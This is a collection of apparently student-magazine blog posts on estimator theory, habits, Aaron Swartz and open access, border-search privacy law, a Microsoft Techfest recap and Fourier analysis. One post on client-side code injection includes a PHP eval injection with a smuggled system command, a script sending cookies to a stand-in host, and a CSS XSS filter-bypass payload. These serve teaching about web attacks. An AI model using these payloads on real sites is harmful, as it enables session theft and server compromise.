Talks of Talks of Estimators

This week, TCS+ hosted a talk by Greg Valiant via a Google+ hangout.  Valiant gave a talk on his work with brother, Paul, on an efficient estimator for entropy and support size of an unknown probability distribution requiring only O(n/log n) samples, where n is a bound on the support size of the distribution.  This work diverges from the existing literature by demonstrating that the estimate can be obtained with a concrete linear program; an algorithm which outputs a distribution very similar to the unknown distribution with respect to certain statistical properties.

A second problem tackled algorithmically by the Valiants is the lower bound on sample size.  Namely, they show that no algorithm on o(n/log n) samples can estimate these properties up to a small additive constant.  The lower bound relies on two multivariate central limit theorems; one with respect to the earthmover distance and which lies foundation for the second, under L1 distance.  (Earthmover distance is also known as the Wasserstein distance. This work on estimating unknown distributions is my first encounter with earthmover distance, and I must say I hope this metric – not only for the nomenclature – catches on!)  The earthmover distance CLT is proved with Stein’s method.  Using Stein’s method for central limit theorems has gained recent popularity as a powerful tool for showing convergence to a particular distribution.  As Valiant himself explains, it is a way to “deal with strange settings gracefully.”  Stein’s method is noteworthy in itself, and I would like to devote a few words on its behalf.

The Stein continuity theorem states that a sequence of real random variables with uniformly bounded second moment, Xn, converges to the standard normal distribution N(0,1) exactly when E[f'(Xn) – Xnf(Xn)] converges to 0.  Here, f : RR is continuously differentiable and both f, f’ are bounded.  In its bare form, this theorem can be used to give Berry-Esséen-type bounds, and in fact, as noted in the wonderful blog post of Terry Tao on the central limit theorem, it can be used to prove the full Berry-Esséen theorem.  In his 1991 article, Götze uses Stein’s method to derive such a multivariate CLT bound for the class of Borel convex subsets of Rk.  His basic strategy for estimating the “distance” in expectation of two probability measures (nicely outlined in a technical report by Rabi Bhattacharya and Susan Holmes) is:

  1. find an invertible map L which maps functions in the space to the null space of the mean of one of the distributions
  2. find a perturbation of L
  3. estimate the distance of distributions by the expected change of L to its perturbation

This algorithmic approach is immediately appealing to me as a computer scientist, and introduces some new ways to think about central limit theorems. Valiant, for example, uses an inspired process to show that a distribution is (nearly) Gaussian. The basic idea behind this approach is to transform unusual or unfamiliar random variables into the multivariate Gaussian by a process of adding noise and rescaling a well-behaved set of test functions. At a high level, Valiant presents this procedure for showing a distribution is close to Gaussian (or any other distribution):

  1. find a transformation for which the Gaussian is a fixed point
  2. apply this transformation to your test functions
  3. look at the change incurred: if no change, the distribution is close to Gaussian/if big change, the distribution is far from Gaussian

We avoid working with the strange distribution by simulating a transformation on carefully chosen test functions.

Valiant’s application of the approach illustrates the versatility of Stein’s method, and its beauty in an algorithmic form. In my opinion, this is a tool that will be of great use to the computer science community because of its elegance and simplicity. And the fact that it prevents fussing around with messy random variables cannot be ignored.

As a closing note, I wanted to comment on the format of the talk. Promptly at 10am PST on Wednesday morning, I and a few other students and faculty met in a conference room where a laptop was hooked up to the projector and lights were dimmed to watch Greg Valiant and a number of other faculty, groups, and perhaps just enthusiasts appropriately outfitted with headsets and coffee mugs, projected onto tiny cells on the screen before us. These cells surrounded the slides accompanying the talk so that the observer had an up-close view of the speaker and attendees. Those who were added to the hangout could interact with verbal questions, and those who missed out on G+ seats were able to contribute with comments. While the scenario was initially jarring, as the talk progressed it became evident that an air of casualness was cast. Something about being seated at your own desk, behind the security of a webcam and a screen, really encourages relaxation and interaction at a comfortable pace. The talk, now posted on YouTube, for instance, spanned a full hour and a half, while the G+ event was scheduled to last only an hour. The talk in no way felt dragged out or verbose, merely paced and relaxed. Further, the recorded stream is now immortalized (for the time being) on YouTube, so the viewer has the freedom to revisit any part of the talk later on. I think this is a trend that will gain some momentum in the future. Following in the footsteps of online open courseware, online venues such as these make important talks available to the general public, and yet maintains the caliber (sanctity) of the talk. I look forward to tuning into some TCS+ streams in the coming weeks!

Habits: our cognitive shortcut

I like my shopping routine at the grocery store around the corner, where my cart seems to easily navigate itself through the isles. Once in a while I make adventurous purchases (the Halloween-edition beer with pumpkin aroma still awaits in my fridge), but I usually stick to the products that have already made me happy before. Whenever in a new town, I try to shop at the same chain, where I know the products and their location on the shelves.

One morning, the parking lot of the usual store was packed. I decided to explore and went to the supermarket across the street for the first time.  My experience at the new place was mildly traumatizing: confronted by all sorts of new packages calling from the shelves, I felt helpless. How should I know what I would like?

In my first blog post I wrote about our mind’s limited computational capacity. When we shop, examining all of the products, predicting how much we will enjoy them and whether the price is reasonable (compared with the alternative) is very costly in terms of cognitive effort. Luckily, our brains have figured out a shortcut that saves a lot of time and mental effort, making it easy to navigate through the local convenient store and fill ours cart with the usual products.

Faced with a novel situation, we usually don’t know what to do. Sooner or later, after a short exploration period of trial and error, we learn what works for us. Animals are not much different: in 1898 American psychologist Edward L Thorndike invented the “puzzle boxes” – cages that the animal (say, a cat) could exit (and get a food reward) only by using a specific response (like pulling a lever, for example). Thorndike found that the time it took the animals to escape and get their food reward decreased with their experience.

Puzzle box

This is not a news for anyone who ever had a pet: animals quickly figure out what action would get them the reward. The process of associating a state of the world with an action and its outcome in the anima’s brain, called “instrumental conditioning”, can be used to teach animals, like raccoons, to perform complicated tasks, like playing basketball.

Do animal learn to associate the sensory stimulus and their responsive actions with the reward, or maybe they are just reinforced to perform the action, regardless of the reward value? To answer this question, Dickinson and colleagues (1995) trained mice to push a lever in order to get food. After 120 successful trials, the mice were fed to satiety. Lacking the motivation to get food, the mice stopped pressing the lever, providing evidence that they had learnt the consequence of their actions, and weren’t just blindly responding to the lever in their cage.

Dickinson repeated his experiment with a new group of mice, but this time he extended the training period to 360 (rather than 120) trials. The effect of over-training on the mice behavior was dramatic: even after they were fed to satiety and no longer wanted the food, they kept pressing the lever. The mice picked up a lever-pressing habit.

Although we all have natural, automatic responses to events in our environment (like the urge to step out of the elevator even though it had stopped in the wrong floor), us, humans, have a sense of control. We believe in our ability to suppress habitual tendencies more easily than other animals. In 2009, Elizabeth Tricomi and colleagues recruited Rutgers college students, making sure that none of the subjects were dieting. Participants fasted for six hours, and then performed a simple task: in each trial, they were instructed to push one of four buttons in order to get a food reward. In some trials, the reward was an M&M; in others it was corn chips (the researcher verified that all of the subjects liked both foods).

Like in Dickinson’s mice studies, subjects were divided into two groups: the first performed the task only for a single day, in two 8-minute training sessions, where the second performed four sessions each day for 3 days – six times as much training. Now came the fun part: after the last training session, participants were given one of the food types, and were instructed to eat until it was no longer pleasant to them. With one of the food “devalued”, subjects went back to perform the task for three more minutes. What do you think happened? When the rewarded food was no longer desirable, the first group stopped pushing buttons, as expected. Surprisingly (or not) the over-trained subjects became habitual, and kept pressing buttons even when the food reward had become unpleasant.

Habit formation imposes a trade-off. Most of the time, the shortcut works well: we easily navigate our cars and carts in familiar avenues without having to pay too much attention. Faced with a new situation, however, we are prone to make mistakes, or even worse – pick up unhealthy habits. Obesity, alcoholism and other addictions are often a result of a long reinforcement history (of alcohol, drugs or fried-chicken) that ended up turning into out of control habits.

Accepting the habitual system as an inseparable part of our minds, understanding its limitation and the way it works, may help us to achieve our long-term goals. Forcing ourselves to start working out and eat healthy is effortful, but the investment will pay off. After a period of reinforcement (by endorphin rush, feeling lighter and getting compliments), our brains will pick up the habit. Going to the gym or having kale salad may become effortless or even enjoyable.

“Information Wants to be Free”

Many of you may have heard or read about the tragic news that Aaron Swartz, a co-founder of Reddit, political organizer, and internet activist took his own life on January 11th at the age of 26. Numerous obituaries, news articles, tributes, and criticisms have been written describing the last days of Aaron’s life and how his prosecution for felony wiretapping charges may have contributed to his suicide. Aaron’s work unquestionably changed the world in ways that are relevant to readers of XRDS.

When Aaron was 14 years old he co-authored the RSS 1.0 specification, technology that is integral to the way we experience news online. Many readers may remember the uproar online on January 18, 2012 over the SOPA/PIPA legislation that was before the U.S. Congress. Eleven major websites including Wikipedia, Google, Reddit, and Mozilla prominently featured, or entirely blacked out their websites to draw attention to the legislation. Aaron was one of the first to notice and draw attention to the legislation, as he later documented in the afterward to Cory Doctorow’s new bookHomeland. The internet blackout effectively killed the legislation when the U.S. Congress received 8 million phone calls, 4 million emails, and 10 million signatures (at least) in a single day. This was probably the single most successful and compelling example of internet-only activism that has ever occurred, demonstrating proof of concept to naysayers.

Aaron founded and was involved with a number of political organizations that were trying to take activism online including Demand Progress, Rootstrikers, and Avaaz. He was also closely linked to a project covered in the Winter 2011 issue of XRDS. The article was “Using Software to Liberate U.S. Case Law” by Harlan Yu and Stephen Schultze. Timothy B. Lee, another collaborator on the project, recently published a tell-all inside story about the project on Ars Technica that describes Aaron’s involvement with the project.

At the time of his death, Aaron was under prosecution for breaking into an MIT networking closet and installing a laptop that crawled JSTOR, an online digital library that charges institutions for access to its archives of academic articles, and downloaded a massive set of documents. Friends of Aaron recently released a tool called the JSTOR Liberator that follows the same basic scheme that the RECAP PACER project used to “liberate” U.S. case law. When someone, who is allowed to access a document, installs the bookmarklet or browser plugin and activates it, if the document is legally in the public domain a copy is made and transmitted to a free archive so that anyone who does not have access can find it for free.

Although JSTOR and the ACM are very different institutions with different purposes, funding models, and practices there are some very relevant similarities. Both maintain digital databases of thousands of academic articles and both charge for access to the full versions of many of those articles. The ACM has taken many steps in recent months toward opening up its archive. These changes include the ACM Authorizer, which allows authors to post links to their papers on personal webpages. More recent changes are discussed in the February issue of the Communications of the ACM. Until these changes were made, scholars wishing to publish in ACM conferences, journals, and venues were forced to give up copyright to the ACM. Among students we have spoken with informally, this was often a source of frustration.

Scientists and engineers are often motivated by a desire to change the world for the better by creating new knowledge that others might use to innovate. The fact that the most elite publication venues required a copyright transfer that could allow the publisher to lock the content up behind a pay wall was a conundrum with few solutions for those at the top of their field. ACM’s new policy is complex and still somewhat vague. Although it appears to be a step in the right direction, we will have to wait and see about the details of the implementation before placing judgment.

The title of this letter is “Information Wants to be Free,” a quote from Stewart Brand, which refers to the fact that it is constantly becoming cheaper to publish information. In an era in which publication costs are shrinking enormously, how long can business models that rely on copyright assignment to publish academic work remain viable, and how can they adapt? Are there reasons to copyright scholarly publication that extend beyond revenue?

In the coming issues of XRDS, we will be using this space to host a conversation among leading scholars and players in the debate over copyright, publishing houses, and academic research. We hope you look forward to learning more about these issues as much as we do. To that end, we are publishing Aaron’s Guerilla Open Access Manifesto in its entirety to open the discussion. The views expressed in the Manifesto are not our own but serve as a provocative starting point.

As this issue is going to press, the director of the Office of Science and Technology Policy, an extension of the White House, has issued a policy memorandum directing Federal agencies to ensure that the results of federally funded research, including scholarly articles, will be freely available to the public within one year of publication. Given that most published research in computer science is funded by the National Science Foundation and the Defense Advanced Research Projects Agency, this change in policy may have broad implications for the ACM’s publishing division.

Sincerely,

Peter Kinnaird & Inbal Talgam-Cohen

On a more personal note, when I was discussing ideas for online organizing and activism with a friend a few months ago, he offered to make an introduction to Aaron Swartz who might have been able to help me with the project or provide valuable feedback. I waited too long to take him up on that offer. So to close, I’d like to call you all to action. Don’t wait to change the world. Do it today. Don’t wait to ask for help from those who are in positions of power or have the right connections. Do it today. Don’t be afraid to fail. Keep on trying. Carpe diem.

Sincerely,

Peter Kinnaird

Some Thoughts (And Questions) About U.S. v. Cotterman – Part 2 of 2

So, in my first post about the recent Ninth Circuit opinion U.S. v. Cotterman, I introduced the opinion’s idea of a “forensic computer search” and asked some questions about what that category might include, and whether it’s a coherent bar for a heightened level of Fourth Amendment privacy protection at the United States border.

This post is more of the “what have we learned?” side of the discussion. I think that the privacy problems identified in the opinion reveal one underlying idea:

User Agency Is A Privacy Issue.

When we use our personal digital devices (I’ll use laptops as a default example in this post), the devices automatically collect and store data to maintain a detailed record of what we were doing. Digital information’s unique qualities  - fungibility, persistence, ease of storage, recoverability, reproducibility – make these behavioral records accordingly unique in the same ways.

These qualities give rise to special privacy concerns. They create a persistent, indefinitely stored cache of behavioral data (which frequently includes information that our laws already categorize as private, like correspondence and medical history) that can be effortlessly copied and/or analyzed at an unprecedented level of detail in the blink of an eye.

Of course, the special qualities of digitally stored information exist whether or not the information in question is something we feel deserves to be protected from governmental intrusion. Privacy concerns are raised when personal information that we ordinarily think of as private or sensitive is stored in the digital format, because that form of storage enables digital search and analysis. Digital search and analysis is faster and easier than searches of tangible media, and has the added bonus of being increasingly revealing of sensitive personal information – information that might fall within the ambit of our ideas about privacy.

User agency is the ability of the device user to control what the device does. In most devices, user agency is quite limited, especially when it comes to the automated collection and storage of user-generated information. (I don’t mean only information input by the user, but all the information resulting from user activity.) I’ll use an example from Cotterman to illustrate what I mean.

The opinion says that a forensic search is invasive in part because it allows the forensic technician to access information that the user can’t access herself, and goes on to say that the retention of information “beyond the perceived point of erasure” is a privacy issue.

“Perceived erasure” is a great example of how conventions in software and computer design deny user agency.  “Deletion” marks the perceived point of erasure for many computer users.

Of course, deleting a file does not “erase” it from the computer’s hard drive. But there are reasons that most people perceive “deleting” a file to be the same as “erasing” it. Here’s what the Mirriam-Webster online dictionary tells me “delete” means:

“to eliminate, especially by blotting out, cutting out, or erasing”

A button labeled “Delete” tells users that pressing it will eliminate or erase data. The people who design computers and computer software know better than most that this just isn’t true. The language we use to describe how computers work is misleading. That’s a user agency issue because a user who wants to erase information isn’t directly, immediately, and explicitly given the ability to accomplish that goal. Instead, she’s offered a function that looks like it will erase information, and she’s given no indication of what initiating that function actually does. She’s given a visualization of the file disappearing from view, or sliding into a trash can that she can then “empty.”

Why not design a user experience that’s less misleading? Shouldn’t some of the burden of understanding rest with the creators of these programs?

One response to this is to say that the burden rests with users. Users should familiarize themselves more with the way their computers actually function, rather than simply relying on the labels that come with their operating systems and user-facing software applications.  I took what I think was a reasonable first step to achieving this goal and looked for information online. Here’s what I found when I searched Wikipedia for information about how data gets erased (or not):

“Many operating systems, file managers, and other software provide a facility where a file is not immediately deleted when the user requests that action. Instead, the file is moved to a holding area, to allow the user to easily revert a mistake. Similarly, many software products automatically create backup copies of files that are being edited, to allow the user to restore the original version, or to recover from a possible crash (autosave feature). Even when an explicit deleted file retention facility is not provided or when the user does not use it, operating systems do not actually remove the contents of a file when it is deleted unless they are aware that explicit erasure commands are required, like on a solid-state drive. … Likewise, reformatting, repartitioning, or reimaging a system is not always guaranteed to write to every area of the disk, though all will cause the disk to appear empty or, in the case of reimaging, empty except for the files present in the image, to most software.”

Well, I made a good faith effort to familiarize myself with how my computer actually works, default software interfaces notwithstanding. Where did it get me? Nowhere. I’m more aware of the limits on my user agency, but I’m no more able to erase data than I was before. In fact, I’m starting to think that it’s not really possible to erase data from my computer. And that brings me back to the same question: why does it have a “delete” button at all?

I think the most likely explanation is simple: the button says “delete” because the first systems used the word, people got used to it, and nobody wants to introduce confusion by changing the vocabulary around. It’s a skeuomorph – a design that makes a thing resemble another material or technique. Designers talk about perceived affordances, about using comfortably familiar shorthand to indicate to users what something can or can’t do. The problem is that all too often, designs present perceived affordances that are misleading.

Designing For User Agency Will Improve Our Privacy Rights

I think that designers and computing engineers should bear some of the burden in the digital privacy debate, because otherwise their valuable perspective will be lost. It is inconceivable to me that the systems we currently use represent the absolute apex of usability and transparency. Designers and engineers deserve more credit than that. Increased transparency doesn’t necessarily mean unwieldy user experience, or forcing everyone to use command-line interfaces for everything. Small changes could yield meaningful results: changing defaults so that users can access a visual representation of where everything is, including files that we would otherwise call “deleted.” Changing the word “delete” to something else – “rewrite” or “scramble,” maybe. (I don’t know, I’m not a designer or an engineer; these are just two words that seem more descriptive to me of what computer systems actually do when I tell them to delete.)

Designing systems for transparency and user agency will benefit the privacy debate on two levels. Individuals will have more freedom to manipulate the information retained by their devices, and the introduction of a new vocabulary of personal computing will move us closer as a culture to a coherent understanding of what our computers can and can’t actually do.

Techfest Recap

Do you remember the computer interface of the future from Minority Report? (Here is a trailer if you haven’t seen it). It seems like we might not be too far from this becoming a reality. Last week, I watched a researcher search a map, play a platformer, and completely control a computer with his hands instead of a mouse. This was one of twenty cool exhibits at Techfest, an event where Microsoft Research demos some of their projects for the public (the event is also called “the & in R&D,” as its purpose is to facilitate the transition from pure research to development). Many of the demos were quite exciting, so I just wanted to share my thoughts about a small subset of the cool things I saw.

The day began with a keynote address by Microsoft’s Chief Research Officer, Rick Rashid, who talked about the history and motivation behind Techfest. He finished with a video of new MSR speech recognition software being used during a talk he gave in China. During the first part of his talk, he was speaking in English while the software generated real time subtitles of his words (English speech to English text) at a significantly lower error rate than the previous gold standard. The software then translated the English text to Chinese text for the audience (I think computers have been pretty good at this part for a while now). But at the end, the program went one step further and had the computer speak Chinese back to the audience in Rick Rashid’s own voice. So at the end of the day, this program could allow you to speak out loud to an audience in a language you don’t understand, in your own voice. If you’re interested, you can see for yourself in the keynote address. The demo starts at ~48:30.

During the keynote address, Rashid also invited researcher Bongshin Lee onstage to give a demo of a new application called SketchInsight, which is a presentation tool for a large touchscreen display. The demo was a short mock talk on energy consumption in which Lee was able to create charts and edit displays with ease to tell a story. It’s hard to do justice to how smoothly the presentation flowed, but you can check it out ~42:00 minutes into the keynote address. What really struck me was that it seems like such a convenient way to give presentations: you still have the same freedom as drawing on a whiteboard, but can also incorporate computer-generated graphs and diagrams on the fly.

Afterwards the audience was turned loose to explore the exhibits on the demo floor. They included new technology for automatically generating test questions, using one’s hands in a computer interface instead of a mouse (as mentioned earlier), and about twenty others. A particularly appealing new app was one that removed the shakiness from a video while filming. As an example, the app took as input a video taken on a highway overpass scanning passing traffic from left to right. The raw video was extremely shaky and watching it made me feel stressed and nauseous. After running through their app, the video looked like it was shot from a tripod by an experienced user changing the angles. What I found most impressive was that the app somehow was able to accurately distinguish between intended movement (scanning left to right) and accidental movement (random shaking), preserving what the camera was trying to capture, but removing everything else.

The day concluded with a talk by principal researcher Bill Buxton on the future of computers and what constitutes great progress. If you had asked me before this talk when touch screen technology was first developed, I probably would have guessed sometime within the last 5 years. I might have believed you if you told me that we’d had this technology after 2000. Maybe. But I would have been way off – Buxton showed us a touch screen watch (with a built-in calculator!) that was released in 1984, four years before I was even born. That’s crazy. So what took us so long to use touch screens on our phones and tablets? The point of the talk was that sometimes great products – ones we can’t seem to live without today – are born when good pre-existing ideas come together the right way. I mean, who in 1984 needed a touch screen on their watch? Without the Internet, or fancy games, or mobile apps, we wouldn’t need touch screens on our phones either, and touch screen technology might never have become so essential. I think the idea of the talk was that the next big thing is always going to be a clever combination of tools we already have, rather than something revolutionary that we’ve never seen before.

Some Thoughts (And Questions) About U.S. v. Cotterman – Part 1 of 2

Last week, the Ninth Circuit released its decision in U.S. v. Cotterman, articulating a new and fascinating standard for border searches of electronic devices. An en banc majority held that government agents need “reasonable suspicion” to justify “forensic examination” of electronic devices at the border. The ruling has been characterized as a win for digital privacy rights – as a general rule, no suspicion whatsoever is required to search people and property at the border. This jump from “no suspicion required” to “reasonable suspicion required” limits when the government can do “forensic examinations,” and grants an exceptional level of protection to electronic devices.

The decision raises a lot of questions – myriad law review articles dissecting it are doubtless being drafted as I write this blog post – but I’m especially curious to get the XRDS audience’s perspective on two, which I’ll be tackling in two separate blog posts.

Today’s question: does the court’s distinction between “forensic” and “manual” examinations of electronic devices make sense to you?

The opinion holds that “computer forensic examinations” like the one conducted by the ICE agent in this case require reasonable suspicion, unlike most border searches. So what is (and what isn’t) a computer forensic examination?

The Factual Background of U.S. v. Cotterman

Mr. Cotterman and his wife came back into the U.S. from Mexico with several digital devices, including laptops and digital cameras. At the border, a DHS database returned a hit on Mr. Cotterman’s name, and the border agent noticed password-protected files when he opened and looked at their laptops. The Cottermans’ computers then went to a senior ICE agent for “computer forensic examination.” The examiner used a program called EnCase to copy the hard drives and analyze their contents, and then personally examined both computers. Ultimately, the examiner located a number of images of child pornography “within the unallocated space” on Cotterman’s laptop.

Computer Forensic Examination: What Does That Mean?

The opinion never expressly defines the phrase “forensic examination,” but it distinguishes “application of computer software to analyze a hard drive” from “manual review of files on an electronic device” and says that the former requires suspicion. Following that train of thought, “forensic examination” must be application of computer software to analyze a hard drive. We can further infer that applying computer software to analyze a hard drive is distinct from manual review. So what’s manual review?

I think it’s reasonable to conclude that the initial examination of the laptops was a “manual review”: the agent opened them and clicked around enough to notice some password-protected files. According to the case’s logic, what the first border agent did wasn’t the forensic search. This tells us the majority is concerned about law enforcement using special law enforcement software to analyze a hard drive. After all, the first agent technically did “apply computer software” when he used the operating system, but under the ruling only the EnCase analysis required reasonable suspicion.

The court says the EnCase program “gave the examiner access to far more data, including password-protected, hidden or encrypted, and deleted files, than a manual user could access.” It says that computer forensic examination “is a powerful tool capable of unlocking password-protected files, restoring deleted material, and retrieving images viewed on web sites.” Based on this, the court goes on to conclude that such a search is unusually invasive and therefore warrants extra protection. Part 2 will go into this line of reasoning in a bit more detail; the salient point for this post is that these three things – password-protected/hidden/encrypted files, deleted material, and web history – raise the privacy stakes in the majority’s view. This is why the ruling singles out the application of software to analyze a hard drive: the court assumes the agents couldn’t have cracked the password-protected files or recovered the deleted images from unallocated space without EnCase.

So, Computing Machinery experts: is it reasonable for the court to assume that the images in unallocated space couldn’t have been recovered without special forensic software? Could an especially skilled technician retrieve the same depth of information without special software like EnCase, creating a huge hole in the majority’s reasoning? Does the majority mean what it thinks it means? 

 

Coming up in part 2: does digital data really need its own special standard?

Fatal Injection: The Client’s Side

In a previous blog post I discussed about a critical class of web attacks known as code injection attacks. In particular, I presented a subset of such attacks where target entities exist on the server. Here we will talk about the emerging subset of dynamic code injection attacks, which, except for server-side entities, threaten network-oriented applications hosted in a client machine, such as the browser and messaging applications.

Python, Perl and PHP are languages that have the capability of interpreting themselves and execute code through a method called eval. Specifically, eval is a function which evaluates a string as though it were an expression and returns a result; A simple example of a dynamic language-driven attack is an input string that is fed into an eval() function call, e.g., in PHP:

$variable = $_GET[’var’];
$input = $_GET[’value’];
eval(’$variable = ’ . $input . ’;’);

Keep in mind that in PHP, the predefined $_GET variable is used to collect values in an HTML form with method="get". In this case, the user may pass into the value parameter, code that will execute in the server. If value is 10; system (’’touch foo’’); then a file will be created on the server; it is easy to imagine more detrimental instances.

Now let’s see how such attacks can affect the client’s side. From man in the browser (MitB) attacks to cross-site request forgery (CSRF) attacks, the client’s side suffers from a wide range of security issues. The majority of such attacks involve one basic vector: JavaScript. Attackers are motivated by the fact that JavaScript is executed as a browser component and enables access to critical objects within the browser. By taking advantage of unchecked assumptions web pages make about their inputs and by bypassing the security mechanisms integrated within the browser, malicious users can inject their JavaScript code into the users’ browser. As a result, they can access sensitive user data or manipulate HTTP methods to their own end.

A JavaScript injection vulnerability is manifested when a web application accepts and redisplays data of uncertain origin. Many web sites allow registered users to post data, which are stored on the server-side (i.e. a third-party comment on a blog page). If attackers hide a script in such data, they could manipulate the browser of another users. For example consider the following code snippet:

<script type="text/javascript">
document.location=’http://host.example/cgi-
bin/cookiestealing.cgi?’+document.cookie

If a malicious user could post data containing the above script, web users reading this data could have their cookies stolen. Through this script the attacker calls an external CGI (common gateway interface) script and passes all the cookies associated with the current document to it as an argument via the document.cookie property. A common but rough way to stop malicious behaviors like this is server-side code filtering (i.e. the server strips out the word “javascript” from any external source). Still, there are many ways to bypass such defense mechanisms. For example, one could take advantage of issues in the implementation of CSS (cascading style sheets) rendering engines of browsers like Internet Explorer (versions prior to 7). Consider the case where an attacker manages to hide the following code fragment in the CSS of a web page:

<div id=code style="background:url('java
script:eval(document.all.code.expr)')"
expr="alert('xss')"></div>

The attacker utilizes the eval function and a newline character (“java\nscript”) to bypass the security checks measures and manoeuvre the user’s browser to execute the code contained in the expr variable. This is done by using the document.all array that contains all of the elements within a document. Malicious users can also use eval to assemble innocuous-looking parts into harmful strings that the protecting mechanisms of a web page would normally consider dangerous and remove.

JavaScript injection attacks are considered as a critical issue in web application security mainly because they are associated with major vulnerabilities such as: Cross-Site Scripting (XSS) attacks and Cross-Channel Scripting (XCS) attacks. For mitigating such vulnerabilities you can check this wonderful survey.

Demystifying the Fourier magic

Over the years I have gotten used to seeing many theorems in theoretical computer science being proved using discrete Fourier analysis. The Walsh-Fourier (Hadamard) transform of Boolean functions proved to be extremely useful in virtually every subfield of theoretical computer science, including PCPs, property testing, pseudorandomness, and communication complexity. As it turns out, many seemingly hard problems can be solved by writing the Walsh-Fourier expansion and using basic theorems of harmonic analysis.

While I have gotten quite comfortable using Fourier analysis when trying to tackle a problem, and even though I developed a pretty good hunch for which cases Fourier analysis should yield nice results – I have to admit that it took me a long time to begin to unravel the Fourier magic; that is, to understand what is so special about the Walsh-Fourier basis that makes it so powerful.

For the rest of this post, I assume that the readers have some proficiency in Fourier analysis. However, in order to make this post (hopefully) a bit more accessible to readers who are new to harmonic analysis, I would like to dedicate the rest of this paragraph to stating out some basic definitions and facts regrading the Fourier transform. Say we have a real function on the hypercube {f:\mathbb{Z}_2^n \rightarrow \mathbb{R}}. The Walsh-Fourier expansion of {f} is defined as follows:

\displaystyle   f(x) = \sum_{S \subseteq [n]}\hat{f}(S)\chi_S(x), \ \ \ \ \ (1)

where the characters {\chi_S: \mathbb{Z}_2^n \rightarrow \mathbb{R}} are defined by

\displaystyle   \chi_S(x_1, \ldots, x_n) = (-1)^{\sum_{i \in S} x_i} \ \ \ \ \ (2)

(note that the summation in Eq. (2) is over {\mathbb{Z}_2^n}, and that the coefficient of each character {\chi_S} is {\hat{f}(S) = \langle f, \chi_S \rangle}). The way I like to think of the Fourier transform is simply as a change of basis for {f}, wherein (hopefully) the representation of {f} is simpler, and hence easier to analyse. It is also interesting to note that if {f} is defined on {\{-1,1\}^n} instead on {\mathbb{Z}_2^n}, then each character {\chi_S: \{-1,1\}^n \rightarrow \mathbb{R}} is the monomial {\chi_S(x) = \prod_{i \in S} x_i}, thus the Fourier expansion is in fact the representation of {f} as a multilinear polynomial over {\mathbb{R}}.

So sure, we have a relatively good understanding of how polynomials behave, and as the foregoing discussion shows, the Fourier transform is a natural way of looking at a function as a multilinear polynomial. But why specifically this base? What is so unique about the base of parities? Are there other bases which are just as effective? Here is my point of view, which I learned from Or Meir: Let {\mathcal{F}} be the linear space of functions {f: \mathbb{Z}_2^n\rightarrow\mathbb{R}}. For every {w\in\mathbb{Z}_2^n}, consider the linear operator {\sigma_w} that maps a function {f \in \mathcal{F}} to the function {f' \in \mathcal{F}} such that {f'(x) = f(x+w)}. Such operators are called shift operators. It turns out that in many natural problems that appear in theoretical computer science (but also in functional analysis, Hardy spaces, the theory of abelian varieties, and the theory of symbolic dynamics) there is a fundamental, underlying need to analyze the effects that such operators have on Boolean functions. Now, a cool property of the Fourier basis (namely, the shift theorem) is the fact that it simultaneously diagonalizes all of the shift operators. Details follow.

Since we are dealing with a finite discrete domain (the Boolean hypercube), we can view the functions in {\mathcal{F}} as vectors in a subspace (i.e, {f\in \mathcal{F}} can be viewed as a vector {v_f \in \mathbb{R}^{2^n}}, where the entries of {v_f} are the values of the truth table of {f}). Then, the shift operators are linear operations on vectors, hence they can be viewed as matrices. As we mentioned before, we wish to simplify the representation of the functions and operators that we study, in order to make them easier to analyse. The best we can hope for is to diagonalize the matrix of the operator we inspect, and this is exactly what the Fourier basis does: In the Fourier basis, all of the shift operators are diagonal matrices.

More generally, the Fourier basis diagonalizes the convolution operator, which also underlies the structure of many natural problems in the analysis of Boolean functions. To see the power of the aforementioned diagonalization, let’s look at an important corollary of it: the convolution theorem. Given functions {f,g \in \mathcal{F}}, their convolution {f * g} is also a function in {\mathcal{F}}, defined by

\displaystyle [f*g](x) = \sum_{y \in \mathbb{Z}_2^n}f(y)g(x-y). \ \ \ \ \ (3)

The convolution theorem for {\mathbb{Z}_2^n} states that the Fourier transform of the pointwise multiplication of two functions is equal to the convolution of their Fourier transforms; that is,

\displaystyle  \widehat{f \cdot g} = \hat{f} * \hat{g}. \ \ \ \ \ (4)

The convolution theorem, as well as the other aforementioned properties of the Fourier transform, makes it very robust for the analysis of Boolean functions. Let me provide an example from my own work (joint with Omer Tamuz). We want to test whether a function {f \in \mathcal{F}} is Boolean or not (i.e, whether its image is contained in a set of cardinality 2, say {\{-1,1\}}). A simple, though crucial, observation is that a function {f \in \mathcal{F}} is Boolean if and only if the convolution of {f} with itself (which sometimes referred to as the autocorrelation of {f}) is equal to the delta function (i.e., the function that gets 1 at 0, and gets 0 elsewhere). To see this, note that {f} is Boolean if and only if {f^2 = 1}, apply the convolution theorem, and use the fact that the Fourier transform of the constant 1 function is the delta function. Hence, using the Fourier expansion we are able to give a characterization of Boolean functions that is efficiently testable. This is a general theme: whenever a function is “correlated with its shifted-self”, it begs for a Fourier based approach.

Last, I would like to give a brief taste of “heavier” tools in the same spirit: We can generalize the discussion on efficient representations even further. Fourier analysis is a special case of the representation theory of finite groups. This theory deals with the more general space of functions {f:G\rightarrow \mathbb{C}} where {G} is a finite group. It allows us to find a basis that makes the analysis of shift operators easier, even though for general groups the shift operators aren’t always diagonalizable. Another possible generalization can be done by analyzing tuples of shifts (e.g., {f(x),f(x+w_1),f(x+w_2),f(x+w_1+w_2)}). In many cases, such analysis cannot be done by standard Fourier analysis, and higher-order Fourier analysis is needed (for more details, see Terry Tao’s excellent survey on this topic).

Open Problems: Returning to the original question at the beginning of the post: are there other bases of functions that will work as well as the Fourier basis? Can we perhaps mimic the success of wavelets in classical harmonic analysis, and use such bases in theoretical computer science?

Brain overload and self control

Many thoughts are running through my head as I aggressively strike the ‘holy trinity’ of strokes, ‘Control-alt-delete’. This is the nightmare of every ‘heavy’ software user: hours of work are about to go down the drain. I wish I hadn’t watched the YouTube that wasted precious computation power. I wish I had a faster processor, or at least a few more Gigabytes of working memory.

As engineers, we are constantly concerned with increasing the efficiency in which our products use limited resources. But as we try to save power and time by reducing computational and memory complexity, most of us are unaware of the limited resources of our brain – the CPU that lies within our skulls.

Last week I went road tripping with a friend to San Francisco. Driving on the highway, I could easily engage in conversation, listen to music and eat – all at the same time. Going off the highway made things more complex. I found it impossible to keep the conversation while trying to find my way through the allies of Mission district. The brain has a limited budget of mental effort, and by multi-tasking I risked getting to the ‘control-alt-delete’ state of my mind.

